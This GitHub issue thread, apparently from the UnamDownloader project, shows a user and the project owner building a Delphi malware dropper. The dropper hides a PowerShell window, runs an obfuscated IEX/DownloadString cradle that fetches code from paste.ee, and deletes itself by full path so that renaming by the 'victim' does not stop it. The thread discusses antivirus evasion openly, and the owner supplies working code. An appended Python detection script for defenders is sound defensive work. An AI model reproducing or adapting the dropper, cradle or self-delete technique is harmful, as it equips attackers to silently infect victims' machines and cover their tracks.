Self Destruct Feature #56

Open
msfcon5ol3 opened this issue Jan 20, 2023 · 9 comments

@msfcon5ol3

This code snippet below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution? Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.
@UnamSanctam
Owner

In the powershell command add a delay and then a command to remove the file (itself).

@msfcon5ol3
Author

In the powershell command add a delay and then a command to remove the file (itself).

This worked but if there's a case in which the file is renamed by victim, this makes this command useless.
What could I do here instead of using the file name as the method of deletion?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

@UnamSanctam
Owner

UnamSanctam commented Jan 20, 2023

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

@msfcon5ol3
Author

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Could you edit the code for me please? I'm a noob in Delphi.


@UnamSanctam
Owner

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

@msfcon5ol3
Author

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

Thanks but compilation error, I'm still trying to fix it....

@UnamSanctam
Owner

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

@msfcon5ol3
Author

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Thanks, finally it worked like a charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release but you may have to add some Delphi / Pascal compiler to your repository and the other options such as start delay, fake error, run as admin etc.

@UnamSanctam
Owner

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.
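
For defenders, the pattern in this thread (a hidden PowerShell child that deletes its parent's image by full path, so renaming the file changes nothing) can be matched on process-creation telemetry. The following is an added example, not part of the thread or the project: it assumes Sysmon Event ID 1 field names (`ParentImage`, `Image`, `CommandLine`), and the `normalize`/`classify` names and the sample events are constructed for illustration.

```python
import re

# Remove-Item and its built-in Windows PowerShell aliases.
DELETE_VERBS = re.compile(r"\b(remove-item|ri|rm|rmdir|del|erase|rd)\b")
QUOTES = "'\"\u2018\u2019\u201c\u201d"  # straight and typographic quotes


def normalize(text: str) -> str:
    """Undo backtick escapes, 'a' + 'b' concatenation and quoting, then lowercase."""
    text = text.replace("`", "")
    text = re.sub(rf"[{QUOTES}]\s*\+\s*[{QUOTES}]", "", text)
    return text.translate({ord(c): None for c in QUOTES}).lower()


def classify(event: dict) -> list:
    """Return findings for one process-creation event."""
    if not event["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    findings = []
    cmd = normalize(event["CommandLine"])
    # Key on the parent's full image path, not a fixed file name, so a
    # renamed executable is still caught.
    if DELETE_VERBS.search(cmd) and normalize(event["ParentImage"]) in cmd:
        findings.append("parent-self-delete")
    if "downloadstring" in cmd and re.search(r"\b(iex|invoke-expression)\b", cmd):
        findings.append("download-cradle")
        if "downloadstring" not in event["CommandLine"].lower():
            findings.append("obfuscated-token")
    return findings


# Constructed sample events (not taken from any real host).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\u\Downloads\renamed copy.exe", "Image": PS,
     "CommandLine": r"powershell start calc.exe;Remove-Item "
                    r"'C:\Users\u\Downloads\renamed copy.exe' -Force"},
    {"ParentImage": r"C:\Users\u\Downloads\tool.exe", "Image": PS,
     "CommandLine": "powershell IEX(New-Object Net.WebClient).\"`D`o`wn`l`oa`d`Str`in`g\""
                    "('htt' + 'ps://' + 'example.invalid/x')"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # benign cleanup
     "CommandLine": r"powershell Remove-Item C:\Temp\old.log -Force"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev))
```

The third event shows the false-positive guard: a PowerShell `Remove-Item` is only flagged when its target is the image of the process that spawned it.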
